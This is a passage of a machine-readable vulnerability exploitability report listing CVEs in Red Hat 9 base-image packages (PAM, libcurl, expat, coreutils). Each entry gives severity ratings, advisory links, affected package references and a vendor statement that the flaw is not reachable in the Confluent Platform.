          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54411",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        208
      ],
      "description": "Linux-PAM through 1.7.2 contains an observable timing discrepancy (CWE-208) in the pam_userdb module's plaintext-password comparison path in modules/pam_userdb/pam_userdb.c that allows a local or network-adjacent attacker able to repeatedly drive authentication through a calling service to recover the plaintext password of a target account by measuring response-timing differences.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54411"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56131"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54411"
        },
        {
          "url": "https://bugzilla.redhat.com/2488766"
        },
        {
          "url": "https://cwe.mitre.org/data/definitions/208.html"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-56131.html"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam/blob/master/libpam/include/pam_inline.h"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam/blob/master/modules/pam_userdb/pam_userdb.c#L327"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54411.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56131.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54411"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54411"
        }
      ],
      "published": "2026-06-14T18:17:20+00:00",
      "updated": "2026-08-10T12:17:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.5.1-28.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5545",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        613
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection when asked to\ndo an authenticated HTTP(S) request after a Negotiate-authenticated one, when\nboth use the same host.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials.\n\nAn application that first uses Negotiate authentication to a server with\n`user1:password1` and then does another operation to the same server asking\nfor any authentication method but for `user2:password2` (while the previous\nconnection is still alive) - the second request gets confused and wrongly\nreuses the same connection and sends the new request over that connection\nthinking it uses a mix of user1's and user2's credentials when it is in fact\nstill using the connection authenticated for user1...",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5545"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5545"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-6g7g-56fm-f8mp"
        },
        {
          "url": "https://hackerone.com/reports/3642555"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5545"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5545"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T10:59:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56132",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        821
      ],
      "description": "In libexpat before 2.8.2, there is a heap-based buffer overflow in doProlog in xmlparse.c because scaffold backing array reallocation is mishandled when there is data-structure sharing across parsers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56132"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56132"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1272"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56132"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56132"
        }
      ],
      "published": "2026-06-19T06:17:10+00:00",
      "updated": "2026-06-23T20:15:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56391",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "GNU coreutils uniq is vulnerable to an out\u2011of\u2011bounds read due to incorrect handling of multibyte input when the -w (--check-chars) option is used. The find_field() function miscalculates the byte length of characters by repeatedly processing a fixed pointer instead of advancing through the input, resulting in an inflated length value. \nThis incorrect length is later used in a memcmp operation, causing reads beyond the allocated buffer when processing crafted multibyte input.\n\nWhen running GNU coreutils uniq with attacker-provided arguments, this behavior leads to a crash and potential adjacent heap memory exposure.\n\n\nThis issue has been fixed in the commit d64e35a8a4c0e4608321433e0d84d917e4e36371.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56391"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56391"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-56391"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=d64e35a8a4c0e4608321433e0d84d917e4e36371"
        },
        {
          "url": "https://github.com/advisories/GHSA-7xvj-m9x7-qgxq"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56391"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56391"
        }
      ],
      "published": "2026-07-24T09:16:25+00:00",
      "updated": "2026-07-30T16:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "8.32-41.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56392",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        }
      ],
      "cwes": [
        122
      ],
      "description": "GNU coreutils unexpand is vulnerable to a heap-based buffer overflow due to an integer overflow during buffer allocation when processing large tab stop (-t) values. The multiplication used to calculate the allocation size can wrap around, resulting in an undersized buffer.\nWhen processing crafted input, subsequent writes exceed the allocated memory, leading to an out\u2011of\u2011bounds heap write.\n\nWhen running GNU coreutils unexpand with attacker-provided large tab stop (-t) arguments, this behavior leads to a crash and potentially achieve a heap write primitive depending on memory layout.\n\n\n\n\n\n\n\n\n\n\nThis issue has been fixed in the commit b60a159fdc5bfcf9988d3a4cb6f53abe8ad5d35d",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56392"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56392"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-56391"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=b60a159fdc5bfcf9988d3a4cb6f53abe8ad5d35d"
        },
        {
          "url": "https://github.com/advisories/GHSA-g24f-m2hx-pfgx"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56392"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56392"
        }
      ],
      "published": "2026-07-24T09:16:25+00:00",
      "updated": "2026-07-30T16:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "8.32-41.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
